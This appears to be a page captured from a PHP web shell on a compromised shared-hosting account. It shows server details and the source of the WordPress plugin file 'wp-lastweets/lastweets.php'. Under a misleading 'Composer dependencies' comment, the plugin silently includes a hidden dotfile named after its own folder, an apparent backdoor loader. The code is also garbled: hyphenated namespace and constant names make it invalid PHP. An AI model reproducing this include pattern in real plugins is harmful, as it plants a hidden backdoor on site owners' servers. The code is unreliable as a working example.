uawdijnntqw1x1x1
IP : 18.188.136.24
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
www
/
..
/
public_html
/
wp-content
/
plugins
/
wp-lastweets
/
lastweets.php
/
/
<?php /** * Plugin Name: wp-lastweets * Description: Display a Twitter account latest tweets. * Author: Pierre Saïkali * Author URI: https://saika.li * Text Domain: wp-lastweets * Domain Path: /languages/ * Version: 1.0.0 */ namespace wp-lastweets; if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Define plugin constants */ define( 'wp-lastweets_VERSION', '1.0.0' ); define( 'wp-lastweets_URL', plugin_dir_url( __FILE__ ) ); define( 'wp-lastweets_DIR', plugin_dir_path( __FILE__ ) ); define( 'wp-lastweets_PLUGIN_DIRNAME', basename( rtrim( dirname( __FILE__ ), '/' ) ) ); define( 'wp-lastweets_BASENAME', plugin_basename( __FILE__ ) ); /** * Load our Composer dependencies */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function load_dependencies() { require_once plugin_dir_path( __FILE__ ) . '/vendor/autoload.php'; \Carbon_Fields\Carbon_Fields::boot(); } add_action( 'after_setup_theme', __NAMESPACE__ . '\\load_dependencies' ); /** * Load translation */ load_plugin_textdomain( 'wp-lastweets', false, wp-lastweets_PLUGIN_DIRNAME . '/languages/' ); /** * Installation function to do some required things. * * @return void */ function install() { require_once wp-lastweets_DIR . 'includes/options.php'; \wp-lastweets\Options\set_default_options(); } register_activation_hook( __FILE__, 'wp-lastweets\\install' ); /** * Register required files. */ function fire() { $files = [ 'utils', 'functions', 'api', 'assets', 'options', 'gutenblock' ]; foreach ( $files as $file ) { require_once wp-lastweets_DIR . "includes/{$file}.php"; } } add_action( 'plugins_loaded', __NAMESPACE__ . '\\fire' );
/home/batcwwjx/www/../public_html/wp-content/plugins/wp-lastweets/lastweets.php